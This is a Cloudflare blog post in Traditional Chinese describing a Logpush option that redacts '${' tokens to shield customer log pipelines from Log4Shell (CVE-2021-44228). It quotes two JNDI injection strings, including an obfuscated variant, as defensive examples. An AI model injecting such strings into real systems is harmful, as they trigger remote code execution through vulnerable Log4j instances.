Subscribe to receive notifications of new posts:

處理 Cloudflare 記錄以保護客戶免受 Log4j 攻擊

12/14/2021

3 min read

2021 年 12 月 9 日,全世界得知 CVE-2021-44228 這種零時差漏洞利用正在影響 Apache Log4j 公用程式。Cloudflare 立即更新了我們的 WAF 以協助防範這個漏洞,但是仍然建議客戶盡快更新其系統。

然而,我們知道許多 Cloudflare 客戶會透過運用 Log4j 的軟體來使用其記錄,因此我們也會透過 Cloudflare 記錄來緩解任何嘗試的漏洞利用。在撰寫此文的同時,我們已在傳送給客戶的記錄中看到漏洞利用模式,每秒高達 1000 次。

現在必須做的是,客戶可以更新其 Logpush 工作,以自動編輯可能會觸發此漏洞的權杖。您可以到我們的開發人員文件中閱讀更多相關資訊,或是參閱下列詳細資料。

攻擊的運作原理

您可以到我們的部落格文章閱讀更多有關 Log4j 漏洞運作原理的資訊。簡而言之,攻擊者可以在任何字串中加上 ${jndi:ldap://example.com/a} 等內容。然後 Log4j 就會在網際網路上進行連線以擷取此目標。

Cloudflare 記錄含有多個字串欄位是由公用網際網路的終端使用者所控制,例如使用者代理程式和 URL 路徑。在任何讀取這些欄位且使用未修補之 Log4j 執行個體的系統上,惡意使用者就可能可以運用這個漏洞造成遠端程式碼執行。

我們的緩解方案

遺憾的是,光是檢查 ${jndi:ldap 這類的權杖並不足以防範此漏洞。因為範本化語言具有表達力,所以也必須檢查是否有模糊的變體。目前我們已經在 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} 這類的外部使用變體中看到攻擊者的蹤跡。因此,編輯 ${ 權杖是防範此漏洞最普遍的方式。

在我們目前傳送給客戶的記錄中,${ 權杖每秒出現高達 1,000 次。快速檢查部分記錄後顯示,其中有許多並非嘗試利用此漏洞。因此,對於可能希望在其記錄中看到此權杖的客戶,我們沒有充足的把握能在不影響他們的情況下編輯記錄。

從現在開始,客戶可以更新其 Logpush 工作以編輯在所有地方出現的 ${ 字串,並將其替換為 x{。

為此,客戶可以更新其 Logpush 工作選項設定,以便納入參數 CVE-2021-44228=true。如需有關如何使用 Logpush API 完成此動作的詳細說明,請參閱我們開發人員文件中的範例。請注意,此選項目前不適用於 Cloudflare 儀錶板,而且僅能透過 API 來修改。

在 Twitter 上討論 在 Hacker News 上討論 在 Reddit 上討論

記錄 漏洞 零時差威脅 網路安全 Log4J

在 Twitter 上關注

Jon Levine |@jplevine

Cloudflare |Cloudflare

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you're looking for a new career direction, check out our open positions.
Vulnerabilities (TW)繁體中文Log4J (TW)Log4Shell (TW)

Follow on X

Jon Levine|@jplevine
Cloudflare|@cloudflare

Related posts

March 14, 2024 12:30 PM

在我們的 AI 產品中緩解權杖長度旁路攻擊

最近,Workers AI 和 AI Gateway 團隊與本·古里安大學的網路安全研究人員就我們「公開漏洞懸賞」活動中收到的一份報告展開了密切合作。透過此程序,我們發現並完全修補了一個影響所有 LLM 提供者的漏洞。下面是具體情況...